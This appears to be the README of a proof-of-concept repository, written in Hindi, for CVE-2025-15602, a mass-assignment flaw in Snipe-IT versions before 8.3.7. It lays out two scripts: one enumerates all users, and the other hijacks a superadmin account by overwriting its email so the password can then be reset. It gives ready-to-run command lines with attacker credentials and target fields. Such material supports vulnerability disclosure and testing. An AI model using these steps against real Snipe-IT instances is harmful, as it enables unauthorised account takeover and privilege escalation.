
Snipe-IT < 8.3.7 में मास असाइनमेंट भेद्यता जो विशेषाधिकार वृद्धि की ओर ले जाती है
CVE-2025-15602-PoC Snipe-IT में CVE-2025-15602 कमजोरी के लिए एक प्रूफ ऑफ कॉन्सेप्ट है। एक स्क्रिप्ट सभी उपयोगकर्ताओं को सूचीबद्ध करती है और एक स्क्रिप्ट एक सुपरएडमिन खाते को हड़प लेती है।
एक उपयोगकर्ता के पास केवल उपयोगकर्ताओं को संपादित करने का अधिकार है, वह इसका दुरुपयोग करके सुपरएडमिन के उपयोगकर्ताओं को सूचीबद्ध कर सकता है और खाता हड़प सकता है।
अपने snipe-it इंस्टेंस से मेल खाने के लिए स्क्रिप्ट में BASE_URL को बदलना न भूलें।
इंस्टेंस से सभी उपयोगकर्ताओं को सूचीबद्ध करता है, ताकि आप जिस सुपरएडमिन को हड़पना चाहते हैं उसका id प्राप्त कर सकें।
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
अपने snipe-it इंस्टेंस से मेल खाने के लिए स्क्रिप्ट में BASE_URL को बदलना न भूलें।
मास असाइनमेंट के माध्यम से एक सुपरएडमिन खाता हड़प लेता है।
महत्वपूर्ण: आपको पहले list_users.py से सही जानकारी प्राप्त करनी होगी अन्यथा यह काम नहीं करेगा। id, username और first_name लक्ष्य खाते के बिल्कुल समान होने चाहिए।
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
उसके बाद आप सेट किए गए ईमेल के माध्यम से पासवर्ड रीसेट कर सकते हैं।
pip install requests beautifulsoup4